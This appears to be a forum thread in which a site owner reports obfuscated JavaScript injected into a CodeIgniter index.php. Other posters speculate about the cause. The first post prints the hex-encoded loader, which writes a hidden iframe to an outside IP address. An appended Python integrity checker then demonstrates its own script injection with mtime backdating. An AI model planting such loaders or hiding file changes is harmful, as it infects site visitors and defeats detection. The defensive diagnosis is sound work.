Codeigniter hacked?
#1

[eluser]Martin Penev[/eluser]
Hi guys,

Yesterday, a friend of mine told me that the website for the Starmountain snowboard community (www.starmountain.ch) has been hacked by a company. After looking into this, I've discovered that someone or something has put additional code after the CodeIgniter code within the index.php.

At first, I couldn't believe it, but it's true: somehow there was JavaScript code in there. For security reasons, I've only pasted the code that was inside the script tags.

Code:
<!--
var d=document,kol=561;
function O10(H48525EBB){ function H48525EBB() {var H48525EBB=16;return H48525EBB;} return( parseInt(H48525EBB,H48525EBB()));}function H48525EBB(H48525EBB){ var H48525EBB='';for(H48525EBB=0; H48525EBB<H48525EBB.length; H48525EBB+=2){ H48525EBB += ( String.fromCharCode (O10(H48525EBB.substr(H48525EBB E913C, 2))));}return H48525EBB;} [removed](H48525EBB('3C7363726970743E696 628216D796961297B642E777269746528273C494652414D452 06E616D653D4F31207372633D5C27687474703A2F2F37372E3 232312E3133332E3137312F2E69662F676F2E68746D6C3F272 B4D6174682E726F756E64284D6174682E72616E646F6D28292 A323037393330292B27376231635C272077696474683D34373 8206865696768743D343335207374796C653D5C27646973706 C61793A206E6F6E655C273E3C2F494652414D45203E27293B7 D766172206D7969613D747275653B3C2F7363726970743E')) ;
//-->

First I thought that it was a break-in because I didn't validate and un-XSS all data, but every form field passed to the validation is being validated.

How is it possible to write into a server-side script without any indication or usage of file-writing code?

Has anybody ever encountered something like this or has an answer?

Greetings

Martin
#2

[eluser]GSV Sleeper Service[/eluser]
Are they on a shared host? The host could be using an old version of cPanel.
#3

[eluser]Martin Penev[/eluser]
Shared host? Yes, but it's not cPanel, I mean the official cPanel. It's more like a customized, perhaps self-programmed one.

Any theories about the hack problem?
#4

[eluser]johnwbaxter[/eluser]
Without having access to the server access logs it would be difficult to tell how this has happened. Also, if there is no info on the file having changed, it may lean towards a server breach and someone having changed the owner of the file and the time it was modified.

Also which version of CI is it on? I seem to remember there being a security vulnerability with an earlier version.
#5

[eluser]xwero[/eluser]
What do you mean by
Quote: How is it possible to write into a server-side script without any indication or usage of filewrite-code?
Are you saying the modification time of the file hasn't changed since the last time you uploaded the index file? I'm not much of a hacker, but that would be hard to do, I think.

The problem could be the security measures of the server, too few restrictions on uploading files, or someone could have intercepted the FTP login for the site.
#6

[eluser]johnwbaxter[/eluser]
I think it is possible to change the modified time of a file if you have enough access to the server. It seems like a lot of trouble to go to, but it is possible, I think.
#7

[eluser]Martin Penev[/eluser]
[quote author="audiopleb" date="1213904921"]Without having access to server access logs it would be difficult to tell how this has happened. Also, if there is not info on the file having changed it may lean towards a server breach and someone having changed the user on the file and the time it was modified.

Also which version of CI is it on? I seem to remember there being a security vulnerability with an earlier version.[/quote]

Yeah, I know, it's pretty difficult to tell without the logs. I'll see if I can contact the provider concerning this.

The app is using CodeIgniter v1.5.4. I haven't upgraded it yet.

[quote author="xwero" date="1213905016"]What do you mean by
Quote:How is it possible to write into a server-side script without any indication or usage of filewrite-code?
Are you saying the modification time of the file isn't changed since the last time you uploaded the index file? I'm not much of a hacker but that would be hard to do i think?

The problem could be the security measures of the server, too little restrictions uploading files or someone could have intercepted the ftp login for the site.[/quote]

I know, I'm no expert in servers either. By "filewrite-code" I mean PHP code that writes into the file system, for example into a text file. Since there's no such code within the app, there must be another reason for the hack.
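Since the thread turns on whether a backdated modification time could hide the appended script, here is an added example (not from the original thread or from CodeIgniter) of a content-based integrity check: it baselines the PHP files by SHA-256, then flags files whose content differs from the baseline or that carry a script/iframe tag after the last `?>` or a long hex blob, regardless of mtime. The `demo()` scenario, the file contents and the regexes are constructed for illustration; the trailing-markup heuristic is meant for pure-PHP files like index.php and would need views that legitimately mix HTML excluded.

```python
import hashlib
import os
import re
import tempfile
from pathlib import Path

# Constructed heuristics for the pattern in the thread: a long hex blob feeding
# a decoder, or a script/iframe tag appended after the file's last '?>'.
HEX_BLOB = re.compile(r"[0-9A-Fa-f]{80,}")
TAG = re.compile(r"<\s*(script|iframe)\b", re.I)

def sha256_file(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()

def build_baseline(root):
    """Map every .php file under root (relative path) to its SHA-256 digest."""
    root = Path(root)
    return {str(p.relative_to(root)): sha256_file(p)
            for p in sorted(root.rglob("*.php")) if p.is_file()}

def looks_injected(text):
    """Flag markup after the last '?>' (pure-PHP files only) or a hex payload."""
    tail = text[text.rfind("?>") + 2:] if "?>" in text else ""
    return bool(TAG.search(tail) or HEX_BLOB.search(text))

def check_tree(root, baseline):
    """Diff the tree against the baseline by content; mtime is never consulted."""
    current = build_baseline(root)
    report = {"modified": [], "added": [], "suspicious": [],
              "missing": sorted(set(baseline) - set(current))}
    for rel, digest in current.items():
        if rel not in baseline:
            report["added"].append(rel)
        elif baseline[rel] != digest:
            report["modified"].append(rel)
        if looks_injected(Path(root, rel).read_text(errors="replace")):
            report["suspicious"].append(rel)
    return report

def demo():
    """Constructed scenario: clean front controller, appended script, backdated mtime."""
    with tempfile.TemporaryDirectory() as root:
        idx = Path(root, "index.php")
        idx.write_text("<?php\nrequire_once BASEPATH.'codeigniter/CodeIgniter'.EXT;\n?>\n")
        baseline = build_baseline(root)
        st = idx.stat()
        with open(idx, "a") as f:   # the kind of append seen in the thread
            f.write("<script>document.write('<IFRAME src=\"http://attacker.invalid/\">');</script>\n")
        os.utime(idx, ns=(st.st_atime_ns, st.st_mtime_ns))  # timestamp restored
        assert idx.stat().st_mtime_ns == st.st_mtime_ns      # mtime gives nothing away
        return check_tree(root, baseline)
```

Run `build_baseline()` on a known-good deployment and keep the resulting dict off the web host; `check_tree()` against that copy catches the change even when the timestamp has been reset.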
